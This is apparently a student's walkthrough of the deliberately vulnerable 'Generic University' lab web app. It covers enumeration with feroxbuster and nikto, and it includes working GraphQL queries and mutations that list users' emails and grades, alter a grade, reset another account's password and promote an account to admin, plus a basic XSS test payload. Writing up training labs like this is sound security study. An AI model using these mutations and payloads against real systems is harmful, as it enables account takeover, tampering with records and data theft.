Generic University¶
Generic University is a "Under Construction" vulnerable web application for student of generic university to see their grades online. This project can be found under OWASP Vulnerable Web Applications DIrectory. It contains some of the vulnerabilities found in OWASP API Top 10 2019 and with very clear goals.
My Personal Objective in this undertaking would be to go through my workflow to refine the enumeration steps. The enumeration done here will be focused on Application Profiling. Next objective will be to find all the vulnerabilities that is in the author's goals. A good reference would be the docker image creator - busk3r's own writeup.
Author's Goals¶
| S/N | Goals | Answer |
|---|---|---|
| 1 | Find the emails of the administrator | #Find Administrator Emails |
| 2 | Brute force the API to find new endpoints | #Discover Hidden Content |
| 3 | Find out what grades everyone got in a class | #Find Everyone's Grades |
| 4 | Edit someone's grade | #Edit Someone's Grades |
| 5 | Make an account | #Registering an account |
| 6 | Access the GraphQL API | #Graphql Enumeration |
| 7 | Change another account's password | #Change Another Account's Password |
| 8 | Login to your account | #Exploring with a Registered Account |
| 9 | Access admin API | #Make a user account Admin |
| 10 | Find out what vulnerabilities the IT admins have ignored | #Exploring with a Registered Account |
| 11 | Make your account an admin | #Make a user account Admin |
| 12 | Access the admin control panel | #Exploring with a Registered Account |
| 13 | Fire a blind XSS in the admin control panel and validate with your new admin account | #XSS on vulnerable forms |
| 14 | Delete everything | #Make a user account Admin |
| 15 | Restore everything | #Make a user account Admin |
2a. Mapping Application Content¶
Explore Visible Content¶
Initial Exploration¶
- We do an initial exploration by setting up burp and exploring the visible web pages with burp proxy and passive crawling turned on. In the table are that of the visible content visited.
| Screenshots | Screenshots |
|---|---|
 |
 |
 |
 |
 |
 |
 |
 |
- The following sitemap is obtained.
- From the sitemap above, we can see that
- We then use Engagement tools : "Find Scripts", "Find Reference", "Find Comments"
| Tools | Results |
|---|---|
| Find Script |  |
| Find Comments | No interesting comments |
| Find References |    |
-
From the results extracted above, we can see that there are a few interesting links we can visit or enumerate further.
-
Additionally, an interesting finding at this stage is
/api/users/6.
-
As highlighted above, the
GETrequest sent makes use of XMLHttpRequest to send to an API endpoint to get the user withid6. -
We hit a "dead end" for exploring visible content here and we will move on to the other kinds of enumeration - #Discover Hidden Content, #Discover Default Content, #Consult Public Resources
Further Exploration¶
- With results from the enumeration from #Discover Hidden Content, #Discover Default Content, we are back to exploring the application further.
| Further Findings | Screenshot |
|---|---|
| /register |  |
| .htaccess |  |
| /web.config |  |
| /api/users |  |
| /api/roles |  |
| /api/classes |  |
- We use the findings above to further explore visible content. This is done by #Registering an account and subsequently #Exploring with a Registered Account.
Registering an account¶
- We use the
/registerfunction to register an account and after registration we are
Exploring with a Registered Account¶
- With registered account we continue out enumeration. When we enumerated the API endpoints below we noticed that
/api/userand/api/adminis redirected to login page. Hence we will attempt to find out more about the API endpoints with this registered account. - As can be seen below,
/api/admingave us the admin API endpoints.
- However, we are unable to use the API endpoints as we did not have the required permissions.
- In our directory busting below, we also had a redirect when
/admindirectory was involved. Hence we will attempt to browse that page.
- We attempt to see if we can acces "Security Vulnerabilities" link and it seems like with a student account, we are able to see the security vulnerabilities.
Consult Public Resources¶
- One of the enumeration steps involved is consulting public resources and hence with this we go to the github of the author to look for some clues. Indeed, we get to know that there should be at least 4 api endpoints and based on what we found, it is possible that we are missing out on one of the endpoints and that is 'grades'.
Discover Hidden Content¶
- Next up we will be doing directory enumeration using feroxbuster. We did not use "Discover Content" it might pollute the sitemap result with it's recursive function. Somehow feroxbuster is faster too.
Initial Discovery¶
Using common.txt¶
feroxbuster -u <url> -w /usr/share/wordlists/dirb/common.txt -o out.txt
- Discovering APIs endpoints
feroxbuster -u <url>/api -w /usr/share/wordlists/dirb/common.txt -o api.txt
- Attempted
/js,/css,/imagediscovery. As can be seen below, nothing was found.
| Extension | Results |
|---|---|
/js |
  |
/css |
  |
/image |
  |
Using a API Specific Wordlist¶
- We enumerated the
/apiand/imagesextension further with a wordlist that is collated bychrislockard.
- From the result above, we can see that for the API endpoints enumerated are the same with the one enumerated with
common.txt.
Using GraphQL specific wordlist¶
- From the above, we can see that graphQL is used and graphIQL(Introspection) is enabled.
Discover Default Content¶
Nikto¶
- Using Nikto Scan on webserver
- Using
-rootscan to scan other directories that we have enumerated.
- From the above result we see some interesting vulnerabilities being flagged like te
/api/usersbeing flagged as something interesting and/adminflagged with OSVDB-630.
Test for Debug Parameters¶
- From the response above, it seems like debug mode is on.
Graphql Enumeration¶
- Using graphw00f, we were able to determine that graphql is used and it can be found at
/graphql.
-
Next we used ferox buster to enumerate for any other graphql endpoints.
-
Following Hacktricks GraphQL guide, we did a "Basic Enumeration" and managed to find that there is yet another endpoint that was not discovered - "Vulnerabilities"
- We found out that
/vulnerabilitiesis parked under/admin
- We then use the burp extension InQL, InQL Scanner to scan for the schema for graphQL used.
The above query can be visualised using graphql voyager where we can see the relationships of the different attributes.
- We will be interested in the
mutationschema as it can help understand what value the mutation can manipulate.
2b. Mapping Attack Surface¶
- With the information gathered above, we can proceed to mapping the surface of attack.
- API endpoints - Information Leakage
- GraphQL API endpoint - Probable Injection via mutation query.
- Display of user side data on admin panel (vulnerable vulnerability submission form) - probable XSS
3. Vulnerability Assessment / Exploitation¶
API Endpoints Information Leakage¶
- As can be seen in #Further Exploration there is information leakage when
/api/[endpoint name]is used. - However, this way of listing things is not efficient as we have to manually correlate.
- Since GraphQL is available, we will use GraphQL to query the data according to what we need.
GraphQL API Injection¶
Query¶
Find Administrator Emails¶
- Using the query below, we canlist all users, their emails and their roles
query {
users {
name
id
email
role{
id
name
}
}
}
| Admin | Admin |
|---|---|
 |
 |
 |
Find Everyone's Grades¶
- Using the query below, we can list all classes, and the grades that corresponds to the students.
query {
class {
id
name
description
grades {
grade
comments
user{
id
name
}
}
}
}
Mutation¶
- Over here we will demonstrate how mutations can be used to manipulate server side values.
Edit Someone's Grades¶
- When we query the class grades with #Find Everyone's Grades we notice that there is this student that is in
uni_class_id:2, withgrade id: 22anduser_id:5with a low grade of 18. - We also found a mutation query which takes in the following parameters.
- We shall attempt to help him push his grades to a better one with the
gradeMutationquery like below :
mutation {
gradeMutation(comments:"code*", created_at:"code*", uni_class_id:2, updated_at:"code*", user_id:5, grade:90, id:22) {
comments
created_at
updated_at
grade
id
user {
role {
created_at
}
}
class {
description
}
}
}
- As can be seen below, his grades are sucesfully changed.
Change Another Account's Password¶
- We noticed that there is a mutation
updateUserPasswordwhich takes in Useridas a string andpasswordas a string.
- We attempt to change a random user's password by using this mutation
mutation {
updateUserPassword(password:"123pass", id:"1") {
id
name
password
role {
name
}
email
updated_at
}
}
- As can be seen above, we are able to login as the user "Cicero Weimann" with the password
123pass.
Make a user account Admin¶
- We will now attempt to use the other mutation
userMutationto see if we can do any things with it.
- Looking at the parameters, it seems like we might be able to change an account's role id. We might even be able to change it's name.
mutation {
userMutation(role_id:1, name:"attacker", id:1) {
id
name
password
role {
name
}
email
updated_at
}
}
-
So it seems we have successfully made this student an "Admin" and changed his name into "attacker".
-
This is verified by the fact that we can run the
/restoreand/deletefunction which we were unable to call without admin rights.
XSS on vulnerable forms¶
- From above, we know that the inputs form
/admin/securitypage comes form "Report a Security Vulnerability" Form. - In the form, we see that there are three input fields.
- We therefore manually test each input field with the following payload
<script>alert()</script>
- Based on out test which can be seen below, only "The Issue" field is vulnerable to XSS.
